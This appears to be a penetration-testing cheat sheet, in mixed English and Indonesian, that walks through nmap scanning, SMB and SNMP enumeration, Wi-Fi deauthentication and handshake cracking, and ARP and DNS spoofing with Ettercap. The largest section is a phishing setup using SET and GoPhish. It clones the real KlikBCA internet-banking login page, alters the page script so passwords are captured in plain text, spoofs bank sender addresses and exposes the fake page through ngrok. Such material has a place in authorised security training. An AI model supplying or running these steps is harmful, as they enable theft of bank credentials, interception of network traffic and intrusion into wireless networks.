- Use Maltego to perform OSINT investigation and analysis: "People Interest".
- Using Burp Suite to poking around, understand app's logic & functionalities, observe all HTTP reqs & resps, attack surface mapping.
- Goals: Understand all access points / attack surfaces & functionalities of the system (HTTP headers, parameters, cookies, APIs, technology, usage/patterns, etc).
- Only Ping Scan to search live hosts, disables port scanning. Choose the target that suited scopes.
nmap 192.168.100.0/24 -sn
nmap 192.168.100.* -sn - Scan Top 10 TCP Ports
nmap 192.168.100.31 --top-ports=10- Fast mode, only scan 100 most common ports
nmap -F -v 192.168.100.31 - Normal-scan, scan 1000 most common ports
nmap -v 192.168.100.31 - Scan all 65535 TCP ports
nmap -p- 192.168.100.31- Operating System (OS) Enumeration. For optimation & efficiency use -Pn to disable ICMP/Ping scan. -n disable dns resolution.
sudo nmap -O 192.168.100.31 -Pn -n- Service Version Detection. Enumerate all services & their version. For optimation & efficiency use -Pn to disable ICMP/Ping scan. -n disable dns resolution.
nmap -p- -v -sV -Pn -n 192.168.100.31- Banner Grabbing. Grab banner of an open port.
nc -nv 192.168.100.31 21
nc -nv 192.168.100.31 80
nmap -sV --script=banner -p21 10.10.10.0/24- Remote Shell (RSH) service on Default Port 514
rsh -l root 192.168.100.31- Remote Login Service (rlogin) on Default Port 513
rlogin -l root 192.168.100.31
msf > search rlogin
msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary (scanner/rservices/rlogin_login) > set rhosts 192.168.100.31
msf auxiliary (scanner/rservices/rlogin_login) > set username root
msf auxiliary (scanner/rservices/rlogin_login) > exploit- HTTP service enumeration on an IP
nmap --script=http-enum 192.168.100.31 -p80,8081- FTP service enumeration
nmap -sC -sV -p21 192.168.100.31
ftp -p 192.168.100.31- SMB service enumeration
nmap --script smb-os-discovery.nse -p445 192.168.100.31
nmap -A -p445 192.168.100.31- List SMB Shares
smbclient -N -L \\\\192.168.100.31- Connect to an SMB share
smbclient \\\\192.168.100.31\\users
ls
NT_STATUS_ACCESS_DENIED listing \*
exit
smbclient -U bob \\\\192.168.100.31\\users- SNMP service enumeration
snmpwalk -v 2c -c public 192.168.100.31 1.3.6.1.2.1.1.5.0
snmpwalk -v 2c -c private 192.168.100.31- Brute force SNMP secret string
onesixtyone -c dict.txt 192.168.100.31- Default Nmap Scripting Engine (NSE) Scanning
# Default: -sC or --script=default
nmap -sC 192.168.100.31
# Script ONLY run based on the port states found by the scan
nmap -sC -p445 192.168.100.31
# To run specific script or category
nmap --script=http-enum -p80 192.168.100.31
nmap --script=http-* -p80 192.168.100.31
nmap --script=banner -p22,23 192.168.100.31
# Aggressive Scan - Performs service detection, OS detection, traceroute and uses defaults scripts to scan the target.
nmap -p 80 -A 192.168.100.31- Nmap Scripting Engine (NSE) - Vuln Category
# NSE location
ls /usr/share/nmap/scripts
# Uses all related scripts from vuln category to see what vulnerabilities we can find
nmap -p 80 -sV --script vuln 192.168.100.31
# Uses specific vuln script
nmap -p 21 -sV --script ftp-vsftpd-backdoor 192.168.100.31- Attacking the User. The art of Human Hacking. Using SET and GoPhish.
# The Social-Engineering Toolkit (SET)
## Credential Harvester Attack
sudo setoolkit
set> 1) Social-Engineering Attacks
set> 2) Website Attack Vectors
set> 3) Credential Harvester Attack Method
# Case 0: Just use default SET template like Google web phising
set> 1) Web Templates
set> IP address listener: your-kali-ip
set> 2. Google
# Case 1: No config
set> 2) Site Cloner
set> IP Address listener: your-kali-ip
set> Enter the url to clone: http://testphp.vulnweb.com/login.php
# Case 2: Perlu Config ubah web server ke apache agar dapat mengubah file web phising di default path /var/www/html/
sudo sed -i 's/^APACHE_SERVER=OFF/APACHE_SERVER=ON/' /etc/setoolkit/set.config
set> 2) Site Cloner
set> IP Address listener: your-kali-ip
set> Enter the url to clone: https://ibank.klikbca.com- Simulasi Phishing Email (Phishing Assessment). Syarat: Harus sudah aktifkan 2FA di akun google utk bisa gunakan SMTP service google utk kirim email phishing.
# Step to Setup MFA on Google and gain SMTP password
- buka google, klik pojok kanan atas
- klik "Manage your Google Account > Security > 2-Step Verification > Add phone number / Authenticator"
# Step to get Google SMTP Service Password
- buka: https://myaccount.google.com/apppasswords
- isi nama aplikasi, copy password utk digunakan sebagai pass SMTP.# Phishing Assessment using SET: Mass Mailer Attack
# NOTE: TERAKHIR COBA UDAH GA BISA, KAYAKNYA FILE CONTENT KOSONG PUN (BUKAN MALWARE) TETAP DI BLOCK GOOGLE, SKIP DULU.
touch /home/kali/update.exe
sudo setoolkit
set> 1) Social-Engineering Attacks
set> 5) Mass Mailer Attack
set> 1. E-Mail Attack Single Email Address
set> 1. Pre-Defined Template
set> 1. New Update
set> Send Email to: victim@email.com
set> 1. Use a gmail Account for your email attack.
set> Your gmail email address: your-gmail-smtp@gmail.com
set:phishing> The FROM NAME the user will see: Administrator
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]: no
Do you want to attach a file - [y/n]: y
The path of file: /home/kali/update.exe
Do you want to attach an inline file - [y/n]: n
[*] SET has finished sending the emails
# Phising Assessment using GoPhish
## If using Kali Linux:
sudo sed -i -e "s/127\.0\.0\.1:3333/0\.0\.0\.0:3333/g" /etc/gophish/config.json
gophish
# open the web UI on port https://your-kali-linux-ip:3333
https://192.168.56.16:3333/
# Default credentials:
# Username: admin
# Password: kali-gophish
# Untuk matiin: gophish-stop
## If using other Linux distro:
mkdir gophish && cd gophish
wget --no-check-certificate -O gophish.zip https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
sudo apt install -y unzip
unzip gophish.zip && rm gophish.zip
sed -i -e "s/127\.0\.0\.1:3333/0\.0\.0\.0:3333/g" config.json
chmod +x gophish
./gophish
# Browse to https://localhost:3333
# See the logs for default credentials
# Jika setelah jalanin Gophish => Unable to connect? pastikan port 80 gak dipake service lain (open), cek pake nmap:
nmap -p80 -sV localhost
# jika dipake (open), cek service mana yg make, terus matiin. Misal dipake Apache2:
service apache2 stop
- Sending Profiles
# Name: Gmai SMTP Server
# SMTP From: admin@klikbca.com
# Host: smtp.gmail.com:587
# Username: your-smtp-mail@gmail.com
- Landing Pages
# Import Site: https://ibank.klikbca.com
# Ubah script bagian var enkrip hilangkan enkripsi agar password ketangkep plain text:
var enkrip = document.getElementById("txt_pswd").value;
# Centang Capture Submitted Data & Capture Passwords
# Redirect to: https://ibank.klikbca.com
- Email Templates
# Create Email Template (KlikBCA) using Grok AI, contoh prompt: "create gophish email templates for klikbca.com phising campaign"
# contoh: https://x.com/i/grok/share/9E14wo6WaBOuBOicnoiJjjFzR
# Name: KlikBCA Account Security Verification
# Envelope Sender: KlikBCA <admin@klikbca.com>
# Subject: Verifikasi Keamanan Akun KlikBCA Anda
# Ubah script sesuaikan bagian logo:
<img src="https://www.klikbca.com/images/top_BCA1.jpg" alt="KlikBCA Logo" width="150">
# Contoh 2 dari Import Email:
# pilih salah satu email Google subject "Notifikasi keamanan"
# klik kanan emailnya > "Tampilkan versi asli" > Copy to clipboard
# Name: Import Email
# Klik "Import Email" > Paste clipboard
# Envelope Sender: Google <your-smtp-gmail@gmail.com>
# Subject: Notifikasi keamanan
- Users & Groups
# Add New Group, Enter victims email and prticular infos.
- Campaigns
# New Campaign
# Name: KlikBCA Campaign
# Attacker / Gophish Server URL (use HTTP not HTTPS!): http://192.168.88.132
# Sending Profile: Gmail SMTP Server - Simulasi Email Spoofing pada Phishing Assessment (GoPhish + MailHog)
mkdir mailhog && cd mailhog
wget https://github.com/mailhog/MailHog/releases/download/v1.0.1/MailHog_linux_amd64
chmod +x MailHog_linux_amd64
sudo ./MailHog_linux_amd64
# Mail Inbox: http://localhost:8025/
# The new SMTP port: 1025
# Change Config on GoPhish:
- Edit Sending Profile
# SMTP From: KlikBCA <halo@bca.co.id>
# Host: localhost:1025
# Username & Pass: kosongin
- Edit Email Template
# Envelope sender: KlikBCA <halo@bca.co.id>
- Launch New Campaign!
- [ ] (Bonus) Using Ngrok for expose localhost to internet
# Ngrok alternative
https://outray.dev/
# Signup & Download: ngrok.com
mkdir ngrok && cd ngrok
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
sudo tar -xvzf ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
ngrok config add-authtoken {{YOUR-AUTH-TOKEN}}
ngrok http http://localhost
# Ganti di GoPhish > New Campaign > URL: generated by ngorok, contoh: https://158a-2001-448a-1001-64ec-9c37-ff83-d99e-ad3.ngrok-free.app
-
System Hacking using Metasploit
-
Web Hacking Using Burp Suite
- Wireless Hacking: Setup Driver & Quick Win using Wifite
# Setup Wireless External Adapter
# Setting virtualbox
Setting -> USB -> USB 2.0
# Check the adapter
(On Virtualbox: Device -> USB -> Check Adapter)
lsusb
ip link
ip a
iwconfig
# update repo dulu
sudo apt update
# If apt update error on signature verification (https://forums.kali.org/t/apt-update-gpg-missing-key-error/7563), do this: sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
# Install driver & reboot for TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS] (v1 gak perlu install driver)
# Driver agar bisa monitor mode dan packet injection
sudo apt install -y realtek-rtl8188eus-dkms
reboot
# Set the adapter into Monitor Mode
sudo ifconfig wlan0 down && sudo iw wlan0 set monitor control && sudo ifconfig wlan0 up && iwconfig
# Mengembalikan ke Managed Mode
sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode managed && sudo ifconfig wlan0 up && iwconfig
# Test Packet Capture and see on wireshark
Open Wireshark
sudo aireplay-ng --test wlan0
## See is there any traffics indicator there on wlan0? If there is no one (0) packet that captured/injected by aireplay-ng, theres an error on wifi devices. Just uncheck & check again (On Virtualbox: Device -> USB -> Uncheck & Re-check Adapter)
# If there is ONLY a problem with process, just check & kill interfering process:
sudo airmon-ng check && sudo airmon-ng check kill
# Wifite akan captures semua yg baru join login wifi dan yang re-join karna ketendang otomatis (de-auth attacks) akan tercapture secara otomatis pada file .pcap nya.
sudo wifite --kill
# without PMKID
sudo wifite --kill --no-pmkid- Network Hacking: The Classic MITM (ARP & DNS Spoofing) using Ettercap & Wireshark
# MITM requirement: Hidupkan ip_forward untuk wireshark agar bisa meng-forward packet yg dicapture
cat /proc/sys/net/ipv4/ip_forward
sudo su
echo 1 > /proc/sys/net/ipv4/ip_forward
# ARP Spoofing with Ettercap
open ettercap GUI
pilih interface target > klik Accept for unified sniffing
klik scan hosts
Add Target 1 (victim), add Target 2 (router/default gateway)
klik MITM Menu > ARP poisoning
Open Wireshark to see packets captured or not
# POST request credentials harvesting in wireshark
# test login on http web login, jika error setelah submit ulang kembali
# cek di wireshark dengan filter:
http.request.method==POST
# DNS spoofing requirements:
Siapkan website phising misal fake google site dengan setoolkit
# Ubah konfigurasi ettercap agar bisa spoof dns, isi dengan ip dimana fake google site running (attacker)
sudo mousepad /etc/ettercap/etter.conf
# Ganti jadi 0 dua baris berikut
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# Uncomment redir_command_* dan IPv6 pada baris:
#---------------
# Linux
#---------------
sudo mousepad /etc/ettercap/etter.dns
google.com A 192.168.100.1
*.google.com A 192.168.100.9
# Launch DNS Spoofing/Poisoning with Ettercap GUI
open ettercap GUI
pilih interface target > klik Accept for start unified sniffing
Stop unified sniffing
klik scan hosts
Add Target 1 (router/default gateway), add Target 2 (victim)
klik MITM Menu > ARP poisoning
klik Plugins > Manage plugins > check dns_spoof
Start unified sniffing
# If crash, just use Ettercap CLI alternative to perform dns spoofing:
sudo ettercap -T -q -i eth1 -M arp:remote /192.168.100.1// /192.168.100.9// -P dns_spoof
# Flush DNS on cmd:
ipconfig /flushdns- Wireless Hacking: Thre Classic Wi-Fi Attacks using Aircrack-NG suites
# Airmon-NG 101
# Start monitoring mode using airmon-ng
sudo airmon-ng start wlan0 && iwconfig
# Test Packet Capture and see on wireshark
Open Wireshark
sudo aireplay-ng --test wlan0
## See is there any traffics indicator there on wlan0? If there is no one (0) packet that captured/injected by aireplay-ng, theres an error on wifi devices. Just uncheck & check again (On Virtualbox: Device -> USB -> Uncheck & Re-check Adapter)
# If there is ONLY a problem with process, just check & kill interfering process:
sudo airmon-ng check && sudo airmon-ng check kill
# Scan on-demand / live capturing all the wireless access points using airodump-ng and note the "channel" of BSSID target
sudo airodump-ng wlan0
# Scan wireless && save output to file with prefix name: "cyber", including .pcap file to crack.
## -c = channel of the Access Point / BSSID target, to narrow down traffic capture. -w = prefix name of captured file (.pcap)
sudo airodump-ng wlan0 -c 6 -w cyber
# Use particular channel of BSSID target (in this example target using CH 6) and specific BSSID mac address to cut the noises and to get target's mac address faster
sudo airodump-ng wlan0 -c 6 --bssid DA:CF:DB:29:F7:7E -w cyber
## De-auth attack to force victim re-join and capture the EOPL (4-way handshake) to then crack with aircrack-ng.
## --deauth 5 = the number of deauths to send, -a = Access Point / BSSID target, -c = MAC address of client that will be de-auth attacked
sudo aireplay-ng --deauth 5 -a DA:CF:DB:29:F7:7E -c E8:B1:FC:F3:AF:20 wlan0
# Crack the .pcap file from airodump-ng
aircrack-ng cyber-01.cap -w /usr/share/wordlists/wifite.txt- Privilege Escalation
- Reporting and Mitigation